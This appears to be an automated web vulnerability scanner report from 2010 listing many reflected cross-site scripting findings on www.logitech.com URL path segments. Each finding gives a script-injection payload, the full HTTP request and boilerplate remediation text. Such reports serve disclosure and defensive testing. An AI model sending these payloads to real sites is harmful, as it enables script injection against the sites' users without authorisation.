Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65b63"><script>alert(1)</script>dde327fa1c7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c592f"><script>alert(1)</script>804ae4a7ba8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c934</script><script>alert(1)</script>c776d4e0a91 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9758f</script><script>alert(1)</script>3e81194fc2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript9758f</script><script>alert(1)</script>3e81194fc2f/v2/cmn/lib/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7021"><script>alert(1)</script>c681e41b608 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascriptd7021"><script>alert(1)</script>c681e41b608/v2/cmn/lib/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3f17"><script>alert(1)</script>c54952337e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript/v2e3f17"><script>alert(1)</script>c54952337e9/cmn/lib/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36a76</script><script>alert(1)</script>1e6c2715cba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v236a76</script><script>alert(1)</script>1e6c2715cba/cmn/lib/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be528</script><script>alert(1)</script>a045b063d4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/cmnbe528</script><script>alert(1)</script>a045b063d4e/lib/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95893"><script>alert(1)</script>63c33978bf9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript/v2/cmn95893"><script>alert(1)</script>63c33978bf9/lib/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23cb4</script><script>alert(1)</script>e4de9a7be46 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/cmn/lib23cb4</script><script>alert(1)</script>e4de9a7be46/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d232"><script>alert(1)</script>7064e8eeef2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript/v2/cmn/lib4d232"><script>alert(1)</script>7064e8eeef2/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afc6e"><script>alert(1)</script>f059fbcef30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78539</script><script>alert(1)</script>7a02ff7725f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92c62"><script>alert(1)</script>16080f5f4e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cda4c</script><script>alert(1)</script>49dd4c9562c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b24c9"><script>alert(1)</script>866b0d6a699 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b0ff</script><script>alert(1)</script>e6ea088c415 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36c84</script><script>alert(1)</script>6a0d34c09fd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6a47"><script>alert(1)</script>018f273470e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 223ba</script><script>alert(1)</script>e672f6a8b51 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 637b8"><script>alert(1)</script>db457f0280a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd0ee</script><script>alert(1)</script>c237f7ed83d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascriptbd0ee</script><script>alert(1)</script>c237f7ed83d/v2/cmn/lib/plugins/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af75a"><script>alert(1)</script>c4a90af7089 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascriptaf75a"><script>alert(1)</script>c4a90af7089/v2/cmn/lib/plugins/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75077"><script>alert(1)</script>37c2255b824 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript/v275077"><script>alert(1)</script>37c2255b824/cmn/lib/plugins/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adb25</script><script>alert(1)</script>ce59cd0e3b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2adb25</script><script>alert(1)</script>ce59cd0e3b4/cmn/lib/plugins/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1eef8</script><script>alert(1)</script>ddf5e2c1592 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/cmn1eef8</script><script>alert(1)</script>ddf5e2c1592/lib/plugins/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bb1e"><script>alert(1)</script>5876d44f691 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript/v2/cmn6bb1e"><script>alert(1)</script>5876d44f691/lib/plugins/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 123b1</script><script>alert(1)</script>2b199d6f1fc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/cmn/lib123b1</script><script>alert(1)</script>2b199d6f1fc/plugins/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb91"><script>alert(1)</script>b5924b555fc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript/v2/cmn/libabb91"><script>alert(1)</script>b5924b555fc/plugins/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55d8a"><script>alert(1)</script>f96745cacef was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript/v2/cmn/lib/plugins55d8a"><script>alert(1)</script>f96745cacef/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 821a9</script><script>alert(1)</script>5ecc11c2a0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/cmn/lib/plugins821a9</script><script>alert(1)</script>5ecc11c2a0/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7104</script><script>alert(1)</script>7d5bddd4753 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascriptc7104</script><script>alert(1)</script>7d5bddd4753/v2/cmn/lib/plugins/third-party/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dda3"><script>alert(1)</script>f9c1898e897 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript6dda3"><script>alert(1)</script>f9c1898e897/v2/cmn/lib/plugins/third-party/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94c6f"><script>alert(1)</script>c26a8e433fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript/v294c6f"><script>alert(1)</script>c26a8e433fe/cmn/lib/plugins/third-party/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71762</script><script>alert(1)</script>66404c841c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
